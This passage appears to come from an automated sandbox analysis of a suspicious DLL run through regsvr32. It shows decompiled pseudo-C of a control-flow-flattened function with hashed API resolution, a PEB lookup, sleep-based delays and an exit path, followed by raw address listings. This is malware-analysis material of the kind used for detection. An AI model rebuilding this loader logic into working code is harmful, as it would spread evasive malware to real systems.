                                                                                                                                                        Function 00007FFD69654BAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DownlevelLocaleName__crttry_get_function
                                                                                                                                                        • String ID: LocaleNameToLCID
                                                                                                                                                        • API String ID: 404522899-2050040251
                                                                                                                                                        • Opcode ID: 0abeedad7c0bf5e17f69596c0581b251e9764620ab500febe9ab44f28993061f
                                                                                                                                                        • Instruction ID: 12ce16aaadcb20b6c72e4af733017e82f9b2857290adf185a136d4b34a48c2c1
                                                                                                                                                        • Opcode Fuzzy Hash: 0abeedad7c0bf5e17f69596c0581b251e9764620ab500febe9ab44f28993061f
                                                                                                                                                        • Instruction Fuzzy Hash: 69E06D35F0CF02D1EA059FD0B8700B83221AF84798F595032E50D07256DE7CF8958303
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Analysis Process: regsvr32.exe PID: 6356 Parent PID: 1724 regsvr32.exeCOMMON

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 004602A4, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 542COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                        			E004602A4(void* __ebx, void* __ecx, void* __edx, signed int __esi, signed long long __rax, signed long long __rcx, char* __r8, void* __r9, void* __r11) {
				signed long long _v72;
				void* _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed long long _v104;
				void* _v112;
				signed long long _v120;
				intOrPtr _v124;
				signed long long _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _t111;
				void* _t115;
				void* _t197;
				signed int _t201;
				void* _t258;
				void* _t268;
				signed int _t269;
				signed int _t271;
				signed long long _t283;
				long long* _t284;
				long long* _t285;
				char* _t290;
				signed long long _t292;
				void* _t305;
				void* _t306;

				_t306 = __r11;
				_t305 = __r9;
				_t304 = __r8;
				_t292 = __rcx;
				_t283 = __rax;
				_t269 = __esi;
				_t197 = __ebx;
				_t290 = __r8;
				_t271 =  ==  ? 0xf29a3544 : 0x9fd7756b;
				r14d = 0x701b759;
				_t258 =  ==  ? r14d : 0xd9502225;
				_v84 = 0xd9502225;
				_t200 =  ==  ? 0xf29a3544 : 0xd4e563f;
				_v88 =  ==  ? 0xf29a3544 : 0xd4e563f;
				_t109 =  ==  ? r14d : 0xa912c783;
				_v92 =  ==  ? r14d : 0xa912c783;
				r15d = 0xda537fa7;
				r15d =  ==  ? 0x170b999c : r15d;
				_t111 = 0xca288c41;
				_t268 = 0x79849ae;
				while(1) {
					L1:
					_v120 = _t292;
					while(1) {
						L2:
						_t201 = _t111;
						if(_t111 > 0xf29a3543) {
							goto L10;
						}
						L3:
						if(_t201 <= 0xb0b3b625) {
							__eflags = _t201 - 0x93c76e2c;
							if(_t201 > 0x93c76e2c) {
								__eflags = _t201 - 0x9fd7756a;
								if(_t201 > 0x9fd7756a) {
									__eflags = _t201 - 0x9fd7756b;
									if(_t201 == 0x9fd7756b) {
										E0045CDB9(0x30, _t283);
										_v104 = _t283;
										_t284 = _v104;
										_v112 = _t284;
										r8d = 0x18d1ea71;
										r9d = 0x2b;
										E0045FAD7(1, _t269, _t284, _t292);
										 *_t284();
										_t285 =  *[gs:0x60];
										r8d = 0x27c2b783;
										r9d = 0xd;
										E0045FAD7(1, _t269, _t285, _t292);
										r8d = 0x30;
										_t299 = _v112;
										r14d = 0x701b759;
										 *_t285();
										_t292 = 0x4602a4;
										_t283 =  *((intOrPtr*)(_v112 + 0x18)) + 0x4602a4;
										_v72 = _t283;
										__eflags =  *((intOrPtr*)(_t285 + 0x10)) - 0x4602a4;
										_t268 = 0x79849ae;
										_t111 =  >  ? 0xb0b3b626 : 0x2f0fb31e;
									} else {
										__eflags = _t201 - 0xa1a997a0;
										if(_t201 == 0xa1a997a0) {
											_v144 = r13d;
											__eflags = _v144 - 0x1520f;
											_t111 =  <  ? 0xea392f63 : 0x859994e5;
										} else {
											_t111 = _t201;
											__eflags = _t201 - 0xa912c783;
											if(_t201 == 0xa912c783) {
												__eflags =  *_t290;
												_t111 =  ==  ? r14d : 0x170b999c;
											}
										}
									}
									while(1) {
										L2:
										_t201 = _t111;
										if(_t111 > 0xf29a3543) {
											goto L10;
										}
										goto L3;
									}
								}
								__eflags = _t201 - 0x93c76e2d;
								if(_t201 == 0x93c76e2d) {
									_t292 = _v136;
									E0045A4E4(_t292);
									L107:
									_t111 = 0xb42b969a;
									while(1) {
										L2:
										_t201 = _t111;
										if(_t111 > 0xf29a3543) {
											goto L10;
										}
										goto L3;
									}
									goto L10;
								}
								__eflags = _t201 - 0x945c137a;
								if(_t201 == 0x945c137a) {
									goto L107;
								} else {
									_t111 = _t201;
									__eflags = _t201 - 0x9a2c0e1f;
									if(_t201 == 0x9a2c0e1f) {
										r13d = _v144;
										r13d = r13d + 3;
										_t111 = 0xa1a997a0;
									}
									continue;
								}
							}
							__eflags = _t201 - 0x859994e4;
							if(_t201 > 0x859994e4) {
								__eflags = _t201 - 0x859994e5;
								if(_t201 == 0x859994e5) {
									__eflags = _v152 + _v164 + _v156 - 0xf302e;
									_t111 =  ==  ? 0x6dc18416 : 0x2e98952d;
									continue;
								}
								__eflags = _t201 - 0x91685319;
								if(_t201 == 0x91685319) {
									_t111 = 0xbe5a0f3f;
									continue;
								}
								_t111 = _t201;
								__eflags = _t201 - 0x91ac664b;
								if(_t201 != 0x91ac664b) {
									continue;
								}
								_t292 = _v136;
								__eflags = E0045A8E0(_t292);
								_t115 = 0x51fb7187;
								L112:
								_t111 =  !=  ? 0xb42b969a : _t115;
								continue;
							}
							__eflags = _t201 - 0x834d46ed;
							if(_t201 == 0x834d46ed) {
								_v152 = (_v156 + 0xfffffffc) * _v164 - _v144 * _v140;
								_v164 = _t292 + _t283 * 2 - _v140 + 0xfffffc19;
								_t262 =  ~(_v152 + _v164) * _v156;
								_v156 = _t292 + _t292 * 2 + _t283 + _t292 * 8 +  ~(_v152 + _v164) * _v156;
								r12d = _v140;
								r12d = r12d + 5;
								_t111 = 0x34527dc1;
								continue;
							}
							__eflags = _t201 - 0x843901b2;
							if(_t201 == 0x843901b2) {
								__eflags = _v148 - 4;
								_t111 =  <  ? 0xe4701c02 : 0x13aae927;
								continue;
							}
							_t111 = _t201;
							__eflags = _t201 - 0x854a966f;
							if(_t201 == 0x854a966f) {
								return _t111;
							} else {
								continue;
							}
						}
						if(_t201 > 0xca288c40) {
							__eflags = _t201 - 0xe4701c01;
							if(_t201 > 0xe4701c01) {
								__eflags = _t201 - 0xe4701c02;
								if(_t201 == 0xe4701c02) {
									__eflags = _v148 - 2;
									_t111 =  <  ? _t268 : 0x91685319;
									continue;
								}
								__eflags = _t201 - 0xea392f63;
								if(_t201 == 0xea392f63) {
									_t111 = 0x34527dc1;
									r12d = 0;
									continue;
								}
								_t111 = _t201;
								__eflags = _t201 - 0xeb6755e2;
								if(_t201 != 0xeb6755e2) {
									continue;
								}
								__eflags = _v148 - 4;
								L96:
								_t111 =  ==  ? _t268 : 0x91685319;
							} else {
								_t111 = r15d;
								__eflags = _t201 - 0xca288c41;
								if(_t201 != 0xca288c41) {
									__eflags = _t201 - 0xd9502225;
									if(_t201 == 0xd9502225) {
										 *_t290 = 0;
										_t111 = 0x701b759;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0xda537fa7;
										if(_t201 == 0xda537fa7) {
											_t111 = _v92;
										}
									}
								}
							}
							continue;
						}
						if(_t201 > 0xc10a918e) {
							__eflags = _t201 - 0xc10a918f;
							if(_t201 == 0xc10a918f) {
								__eflags = _v148 - 8;
								goto L96;
							}
							__eflags = _t201 - 0xc7704248;
							if(_t201 == 0xc7704248) {
								__eflags = _v160 - 8;
								_t111 =  ==  ? 0x93c76e2d : 0x945c137a;
							} else {
								_t111 = _t201;
								__eflags = _t201 - 0xc88989fd;
								if(_t201 == 0xc88989fd) {
									_t283 = _v80;
									_v160 =  *_t283;
									_t111 = 0x7c8c10e9;
								}
							}
							continue;
						}
						if(_t201 <= 0xbe5a0f3e) {
							__eflags = _t201 - 0xb0b3b626;
							if(_t201 != 0xb0b3b626) {
								_t111 = _t201;
								__eflags = _t201 - 0xb42b969a;
								if(_t201 != 0xb42b969a) {
									continue;
								}
								E00453998(_v136);
								E00460C45(); // executed
								__eflags = 0;
								ExitProcess();
							}
							_v120 = _t283;
							r8d = 0x30;
							E0045C8BC(0, _t283, _v104, _t304, _t306);
							_t262 = 1;
							r8d = 0x27c2b783;
							r9d = 0xd;
							E0045FAD7(1, _t269, _t283, _v104);
							r8d = 0x30;
							_t292 = 0x4602a4;
							_t299 = _v112;
							_t268 = 0x79849ae;
							 *_t283();
							_t283 = _v112;
							__eflags =  *((intOrPtr*)(_t283 + 0x28)) - 0x1000000;
							_t111 =  ==  ? 0x48479475 : 0x27daf151;
						} else {
							if(_t201 == 0xbe5a0f3f) {
								_t111 = 0x63da8ac0;
								_v124 = 0x3e8;
							} else {
								_t111 = _t201;
								if(_t201 == 0xbf82bb62) {
									_t111 =  ==  ? 0x91ac664b : 0x945c137a;
								}
							}
						}
						continue;
						L10:
						__eflags = _t201 - 0x2e98952c;
						if(_t201 > 0x2e98952c) {
							__eflags = _t201 - 0x5c545ed3;
							if(_t201 > 0x5c545ed3) {
								__eflags = _t201 - 0x7c8c10e8;
								if(_t201 > 0x7c8c10e8) {
									__eflags = _t201 - 0x7c8c10e9;
									if(_t201 == 0x7c8c10e9) {
										__eflags = _v160 - 2;
										_t111 =  <  ? 0x537690ef : 0xe1b9813;
										continue;
									}
									__eflags = _t201 - 0x7d4a3cd4;
									if(_t201 == 0x7d4a3cd4) {
										_t292 = _v136;
										__eflags = E0045A504(_t262, _t268, _t271, _t283, _t292, _t305);
										_t115 = 0x91ac664b;
										goto L112;
									}
									_t111 = _t201;
									__eflags = _t201 - 0x7da7801f;
									if(_t201 == 0x7da7801f) {
										__eflags = _v160;
										_t111 =  ==  ? 0x51fb7187 : 0x945c137a;
									}
									continue;
								}
								__eflags = _t201 - 0x5c545ed4;
								if(_t201 == 0x5c545ed4) {
									_t262 = 1;
									r8d = 0x510b3a3e;
									r9d = 0x5c;
									E0045FAD7(1, _t269, _t283, _t292);
									 *_t283();
									_t111 = 0xc88989fd;
								} else {
									__eflags = _t201 - 0x63da8ac0;
									if(_t201 == 0x63da8ac0) {
										r8d = 0x9d3c7b7a;
										r9d = 0xb2;
										E0045FAD7(1, _t269, _t283, _t292);
										SleepEx(??, ??); // executed
										_t262 = 0x20;
										E00459F06(0x20, _t269, _v136, _t299, _t304, _t306);
										_t299 = _v136 + _t283;
										_t292 = _v136 + _t283;
										__eflags = E00453A22(_t283, _t292, _v136 + _t283);
										_t111 =  !=  ? 0x5c545ed4 : 0xc88989fd;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0x6dc18416;
										if(_t201 == 0x6dc18416) {
											_v152 = _v152 + _v164 - (_v156 << 4);
											_v164 = _v156 + _t292 + _t292 * 2 + 0xffffffb3;
											_t111 = 0x2e98952d;
										}
									}
								}
								continue;
							}
							__eflags = _t201 - 0x48479474;
							if(_t201 > 0x48479474) {
								__eflags = _t201 - 0x48479475;
								if(_t201 == 0x48479475) {
									_t111 = 0x27daf151;
									while(1) {
										L1:
										_v120 = _t292;
										goto L2;
									}
								}
								__eflags = _t201 - 0x51fb7187;
								if(_t201 == 0x51fb7187) {
									_t292 = _v136;
									E0045C32D(_t262, _t283, _t292, _t306);
									goto L107;
								}
								_t111 = _t201;
								__eflags = _t201 - 0x537690ef;
								if(_t201 == 0x537690ef) {
									__eflags = _v160;
									_t111 =  <=  ? 0x7da7801f : 0x7d4a3cd4;
								}
								continue;
							}
							__eflags = _t201 - 0x2e98952d;
							if(_t201 == 0x2e98952d) {
								E0045CDB9(0xc40, _t283);
								_v136 = _t283;
								_t292 = _v136;
								_t262 = 0x10;
								E00459F06(0x10, _t269, _t292, _t299, _t304, _t306);
								_v80 = _v136 + _t292;
								_t283 = _v80;
								_v148 =  *_t283;
								_t111 = 0x843901b2;
								continue;
							}
							__eflags = _t201 - 0x2f0fb31e;
							if(_t201 == 0x2f0fb31e) {
								_t283 = _v72;
								_t292 = 0x4602a4;
								__eflags = _t283 - 0x4602a4;
								_t111 =  <  ? 0xb0b3b626 : 0x27daf151;
								goto L1;
							} else {
								_t111 = _t201;
								__eflags = _t201 - 0x34527dc1;
								if(_t201 == 0x34527dc1) {
									_v140 = r12d;
									__eflags = _v140 - 0x2b4;
									_t111 =  <  ? 0x834d46ed : 0x9a2c0e1f;
								}
								continue;
							}
						}
						__eflags = _t201 - 0x13aae926;
						if(_t201 > 0x13aae926) {
							__eflags = _t201 - 0x18cf248b;
							if(_t201 > 0x18cf248b) {
								__eflags = _t201 - 0x18cf248c;
								if(_t201 == 0x18cf248c) {
									__eflags = _v160 - 0x40;
									_t111 =  ==  ? 0x187c6430 : 0x945c137a;
								} else {
									__eflags = _t201 - 0x27daf151;
									if(_t201 == 0x27daf151) {
										E0045CC2E(_t283, _v104);
										_t111 = 0xf29a3544;
										_t292 = _v120;
										_t269 = _t201;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0x28c5e58b;
										if(_t201 == 0x28c5e58b) {
											r13d = 0;
											_v152 = r13d;
											_v164 = r13d;
											_v156 = r13d;
											_t111 = 0xa1a997a0;
										}
									}
								}
								continue;
							}
							__eflags = _t201 - 0x13aae927;
							if(_t201 == 0x13aae927) {
								__eflags = _v148 - 8;
								_t111 =  <  ? 0xeb6755e2 : 0xc10a918f;
								continue;
							}
							__eflags = _t201 - 0x170b999c;
							if(__eflags == 0) {
								E0045FC4D(_t197, _t262, _t268, _t269, __eflags, _t283, _t292, _t304, _t305, _t306);
								_t111 = _v84;
								continue;
							}
							_t111 = _t201;
							__eflags = _t201 - 0x187c6430;
							if(_t201 != 0x187c6430) {
								continue;
							} else {
								_t262 = 1;
								r8d = 0x510b3a3e;
								r9d = 0x5c;
								E0045FAD7(1, _t269, _t283, _t292);
								 *_t283();
								goto L107;
							}
						} else {
							__eflags = _t201 - 0x79849ad;
							if(_t201 > 0x79849ad) {
								__eflags = _t201 - 0x79849ae;
								if(_t201 == 0x79849ae) {
									_t111 = 0x63da8ac0;
									_v124 = 0x7530;
								} else {
									__eflags = _t201 - 0xd4e563f;
									if(_t201 == 0xd4e563f) {
										_t269 = 0;
										_t111 = _t271;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0xe1b9813;
										if(_t201 == 0xe1b9813) {
											__eflags = _v160 - 8;
											_t111 =  <  ? 0xbf82bb62 : 0xfbdae760;
										}
									}
								}
							} else {
								__eflags = _t201 - 0xf29a3544;
								if(_t201 == 0xf29a3544) {
									__eflags = (_t269 ^ 0x000000fe) & sil;
									_t111 =  ==  ? 0x28c5e58b : 0x854a966f;
								} else {
									__eflags = _t201 - 0xfbdae760;
									if(_t201 == 0xfbdae760) {
										__eflags = _v160 - 0x40;
										_t111 =  <  ? 0xc7704248 : 0x18cf248c;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0x701b759;
										if(_t201 == 0x701b759) {
											_t269 = 0;
											_t111 = _v88;
										}
									}
								}
							}
							continue;
						}
					}
				}
			}



































                                                                                                                                                        0x004602a4
                                                                                                                                                        0x004602a4
                                                                                                                                                        0x004602a4
                                                                                                                                                        0x004602a4
                                                                                                                                                        0x004602a4
                                                                                                                                                        0x004602a4
                                                                                                                                                        0x004602a4
                                                                                                                                                        0x004602b7
                                                                                                                                                        0x004602c6
                                                                                                                                                        0x004602cc
                                                                                                                                                        0x004602d7
                                                                                                                                                        0x004602db
                                                                                                                                                        0x004602e6
                                                                                                                                                        0x004602e9
                                                                                                                                                        0x004602f2
                                                                                                                                                        0x004602f6
                                                                                                                                                        0x004602fa
                                                                                                                                                        0x00460305
                                                                                                                                                        0x00460309
                                                                                                                                                        0x0046030e
                                                                                                                                                        0x00460313
                                                                                                                                                        0x00460313
                                                                                                                                                        0x00460313
                                                                                                                                                        0x00460318
                                                                                                                                                        0x00460318
                                                                                                                                                        0x00460318
                                                                                                                                                        0x0046031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460321
                                                                                                                                                        0x00460327
                                                                                                                                                        0x004603d2
                                                                                                                                                        0x004603d8
                                                                                                                                                        0x004604b1
                                                                                                                                                        0x004604b7
                                                                                                                                                        0x00460656
                                                                                                                                                        0x0046065c
                                                                                                                                                        0x00460a72
                                                                                                                                                        0x00460a77
                                                                                                                                                        0x00460a7c
                                                                                                                                                        0x00460a81
                                                                                                                                                        0x00460a8d
                                                                                                                                                        0x00460a93
                                                                                                                                                        0x00460a99
                                                                                                                                                        0x00460aa0
                                                                                                                                                        0x00460aa2
                                                                                                                                                        0x00460abe
                                                                                                                                                        0x00460ac4
                                                                                                                                                        0x00460aca
                                                                                                                                                        0x00460acf
                                                                                                                                                        0x00460ad8
                                                                                                                                                        0x00460ade
                                                                                                                                                        0x00460ae4
                                                                                                                                                        0x00460aef
                                                                                                                                                        0x00460af6
                                                                                                                                                        0x00460af9
                                                                                                                                                        0x00460b01
                                                                                                                                                        0x00460b04
                                                                                                                                                        0x00460b13
                                                                                                                                                        0x00460662
                                                                                                                                                        0x00460662
                                                                                                                                                        0x00460668
                                                                                                                                                        0x00460b1b
                                                                                                                                                        0x00460b24
                                                                                                                                                        0x00460b33
                                                                                                                                                        0x0046066e
                                                                                                                                                        0x0046066e
                                                                                                                                                        0x00460670
                                                                                                                                                        0x00460676
                                                                                                                                                        0x0046067c
                                                                                                                                                        0x00460684
                                                                                                                                                        0x00460684
                                                                                                                                                        0x00460676
                                                                                                                                                        0x00460668
                                                                                                                                                        0x00460318
                                                                                                                                                        0x00460318
                                                                                                                                                        0x00460318
                                                                                                                                                        0x0046031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0046031f
                                                                                                                                                        0x00460318
                                                                                                                                                        0x004604bd
                                                                                                                                                        0x004604c3
                                                                                                                                                        0x00460931
                                                                                                                                                        0x00460936
                                                                                                                                                        0x00460b60
                                                                                                                                                        0x00460b60
                                                                                                                                                        0x00460318
                                                                                                                                                        0x00460318
                                                                                                                                                        0x00460318
                                                                                                                                                        0x0046031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0046031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460318
                                                                                                                                                        0x004604c9
                                                                                                                                                        0x004604cf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004604d5
                                                                                                                                                        0x004604d5
                                                                                                                                                        0x004604d7
                                                                                                                                                        0x004604dd
                                                                                                                                                        0x004604e3
                                                                                                                                                        0x004604e8
                                                                                                                                                        0x004604ec
                                                                                                                                                        0x004604ec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004604dd
                                                                                                                                                        0x004604cf
                                                                                                                                                        0x004603de
                                                                                                                                                        0x004603e4
                                                                                                                                                        0x004605e8
                                                                                                                                                        0x004605ee
                                                                                                                                                        0x00460a2b
                                                                                                                                                        0x00460a3a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460a3a
                                                                                                                                                        0x004605f4
                                                                                                                                                        0x004605fa
                                                                                                                                                        0x00460a42
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460a42
                                                                                                                                                        0x00460600
                                                                                                                                                        0x00460602
                                                                                                                                                        0x00460608
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0046060e
                                                                                                                                                        0x00460618
                                                                                                                                                        0x0046061a
                                                                                                                                                        0x00460bc8
                                                                                                                                                        0x00460bcd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460bcd
                                                                                                                                                        0x004603ea
                                                                                                                                                        0x004603f0
                                                                                                                                                        0x0046085c
                                                                                                                                                        0x0046087f
                                                                                                                                                        0x004608a1
                                                                                                                                                        0x004608af
                                                                                                                                                        0x004608b3
                                                                                                                                                        0x004608b8
                                                                                                                                                        0x004608bc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004608bc
                                                                                                                                                        0x004603f6
                                                                                                                                                        0x004603fc
                                                                                                                                                        0x004608ca
                                                                                                                                                        0x004608d7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004608d7
                                                                                                                                                        0x00460402
                                                                                                                                                        0x00460404
                                                                                                                                                        0x0046040a
                                                                                                                                                        0x00460c2a
                                                                                                                                                        0x00460410
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460410
                                                                                                                                                        0x0046040a
                                                                                                                                                        0x00460333
                                                                                                                                                        0x00460473
                                                                                                                                                        0x00460479
                                                                                                                                                        0x00460624
                                                                                                                                                        0x0046062a
                                                                                                                                                        0x00460a50
                                                                                                                                                        0x00460a58
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460a58
                                                                                                                                                        0x00460630
                                                                                                                                                        0x00460636
                                                                                                                                                        0x00460a60
                                                                                                                                                        0x00460a65
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460a65
                                                                                                                                                        0x0046063c
                                                                                                                                                        0x0046063e
                                                                                                                                                        0x00460644
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0046064e
                                                                                                                                                        0x004609f9
                                                                                                                                                        0x004609fe
                                                                                                                                                        0x0046047f
                                                                                                                                                        0x0046047f
                                                                                                                                                        0x00460482
                                                                                                                                                        0x00460488
                                                                                                                                                        0x0046048e
                                                                                                                                                        0x00460494
                                                                                                                                                        0x00460924
                                                                                                                                                        0x00460927
                                                                                                                                                        0x0046049a
                                                                                                                                                        0x0046049a
                                                                                                                                                        0x0046049c
                                                                                                                                                        0x004604a2
                                                                                                                                                        0x004604a8
                                                                                                                                                        0x004604a8
                                                                                                                                                        0x004604a2
                                                                                                                                                        0x00460494
                                                                                                                                                        0x00460488
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460479
                                                                                                                                                        0x0046033f
                                                                                                                                                        0x004605ad
                                                                                                                                                        0x004605b3
                                                                                                                                                        0x004609f6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004609f6
                                                                                                                                                        0x004605b9
                                                                                                                                                        0x004605bf
                                                                                                                                                        0x00460a0a
                                                                                                                                                        0x00460a17
                                                                                                                                                        0x004605c5
                                                                                                                                                        0x004605c5
                                                                                                                                                        0x004605c7
                                                                                                                                                        0x004605cd
                                                                                                                                                        0x004605d3
                                                                                                                                                        0x004605da
                                                                                                                                                        0x004605de
                                                                                                                                                        0x004605de
                                                                                                                                                        0x004605cd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004605bf
                                                                                                                                                        0x0046034b
                                                                                                                                                        0x00460788
                                                                                                                                                        0x0046078e
                                                                                                                                                        0x00460bd5
                                                                                                                                                        0x00460bd7
                                                                                                                                                        0x00460bdd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460c30
                                                                                                                                                        0x00460c37
                                                                                                                                                        0x00460c3c
                                                                                                                                                        0x00460c3e
                                                                                                                                                        0x00460c3e
                                                                                                                                                        0x0046079b
                                                                                                                                                        0x004607a0
                                                                                                                                                        0x004607a8
                                                                                                                                                        0x004607b4
                                                                                                                                                        0x004607b9
                                                                                                                                                        0x004607bf
                                                                                                                                                        0x004607c5
                                                                                                                                                        0x004607ca
                                                                                                                                                        0x004607d0
                                                                                                                                                        0x004607d7
                                                                                                                                                        0x004607da
                                                                                                                                                        0x004607df
                                                                                                                                                        0x004607e1
                                                                                                                                                        0x004607e6
                                                                                                                                                        0x004607f7
                                                                                                                                                        0x00460351
                                                                                                                                                        0x00460357
                                                                                                                                                        0x004607ff
                                                                                                                                                        0x00460804
                                                                                                                                                        0x0046035d
                                                                                                                                                        0x0046035d
                                                                                                                                                        0x00460365
                                                                                                                                                        0x00460378
                                                                                                                                                        0x00460378
                                                                                                                                                        0x00460365
                                                                                                                                                        0x00460357
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0046037d
                                                                                                                                                        0x0046037d
                                                                                                                                                        0x00460383
                                                                                                                                                        0x00460415
                                                                                                                                                        0x0046041b
                                                                                                                                                        0x0046054c
                                                                                                                                                        0x00460552
                                                                                                                                                        0x0046074b
                                                                                                                                                        0x00460751
                                                                                                                                                        0x00460ba2
                                                                                                                                                        0x00460baf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460baf
                                                                                                                                                        0x00460757
                                                                                                                                                        0x0046075d
                                                                                                                                                        0x00460bb7
                                                                                                                                                        0x00460bc1
                                                                                                                                                        0x00460bc3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460bc3
                                                                                                                                                        0x00460763
                                                                                                                                                        0x00460765
                                                                                                                                                        0x0046076b
                                                                                                                                                        0x00460771
                                                                                                                                                        0x00460780
                                                                                                                                                        0x00460780
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0046076b
                                                                                                                                                        0x00460558
                                                                                                                                                        0x0046055e
                                                                                                                                                        0x00460969
                                                                                                                                                        0x0046096e
                                                                                                                                                        0x00460974
                                                                                                                                                        0x0046097a
                                                                                                                                                        0x00460984
                                                                                                                                                        0x00460986
                                                                                                                                                        0x00460564
                                                                                                                                                        0x00460564
                                                                                                                                                        0x0046056a
                                                                                                                                                        0x00460997
                                                                                                                                                        0x0046099d
                                                                                                                                                        0x004609a3
                                                                                                                                                        0x004609ae
                                                                                                                                                        0x004609b5
                                                                                                                                                        0x004609ba
                                                                                                                                                        0x004609c9
                                                                                                                                                        0x004609d6
                                                                                                                                                        0x004609de
                                                                                                                                                        0x004609ea
                                                                                                                                                        0x00460570
                                                                                                                                                        0x00460570
                                                                                                                                                        0x00460572
                                                                                                                                                        0x00460578
                                                                                                                                                        0x0046058b
                                                                                                                                                        0x0046059f
                                                                                                                                                        0x004605a3
                                                                                                                                                        0x004605a3
                                                                                                                                                        0x00460578
                                                                                                                                                        0x0046056a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0046055e
                                                                                                                                                        0x00460421
                                                                                                                                                        0x00460427
                                                                                                                                                        0x004606cc
                                                                                                                                                        0x004606d2
                                                                                                                                                        0x00460c0b
                                                                                                                                                        0x00460313
                                                                                                                                                        0x00460313
                                                                                                                                                        0x00460313
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460313
                                                                                                                                                        0x00460313
                                                                                                                                                        0x004606d8
                                                                                                                                                        0x004606de
                                                                                                                                                        0x00460b56
                                                                                                                                                        0x00460b5b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460b5b
                                                                                                                                                        0x004606e4
                                                                                                                                                        0x004606e6
                                                                                                                                                        0x004606ec
                                                                                                                                                        0x004606f2
                                                                                                                                                        0x00460701
                                                                                                                                                        0x00460701
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004606ec
                                                                                                                                                        0x0046042d
                                                                                                                                                        0x00460433
                                                                                                                                                        0x004608e4
                                                                                                                                                        0x004608e9
                                                                                                                                                        0x004608ee
                                                                                                                                                        0x004608f3
                                                                                                                                                        0x004608f8
                                                                                                                                                        0x0046090a
                                                                                                                                                        0x0046090f
                                                                                                                                                        0x00460916
                                                                                                                                                        0x0046091a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0046091a
                                                                                                                                                        0x00460439
                                                                                                                                                        0x0046043f
                                                                                                                                                        0x00460be5
                                                                                                                                                        0x00460bed
                                                                                                                                                        0x00460bf4
                                                                                                                                                        0x00460c01
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460445
                                                                                                                                                        0x00460445
                                                                                                                                                        0x00460447
                                                                                                                                                        0x0046044d
                                                                                                                                                        0x00460453
                                                                                                                                                        0x0046045c
                                                                                                                                                        0x0046046b
                                                                                                                                                        0x0046046b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0046044d
                                                                                                                                                        0x0046043f
                                                                                                                                                        0x00460389
                                                                                                                                                        0x0046038f
                                                                                                                                                        0x004604f6
                                                                                                                                                        0x004604fc
                                                                                                                                                        0x00460709
                                                                                                                                                        0x0046070f
                                                                                                                                                        0x00460b6e
                                                                                                                                                        0x00460b7b
                                                                                                                                                        0x00460715
                                                                                                                                                        0x00460715
                                                                                                                                                        0x0046071b
                                                                                                                                                        0x00460b88
                                                                                                                                                        0x00460b8d
                                                                                                                                                        0x00460b92
                                                                                                                                                        0x00460b97
                                                                                                                                                        0x00460721
                                                                                                                                                        0x00460721
                                                                                                                                                        0x00460723
                                                                                                                                                        0x00460729
                                                                                                                                                        0x0046072f
                                                                                                                                                        0x00460732
                                                                                                                                                        0x00460737
                                                                                                                                                        0x0046073c
                                                                                                                                                        0x00460741
                                                                                                                                                        0x00460741
                                                                                                                                                        0x00460729
                                                                                                                                                        0x0046071b
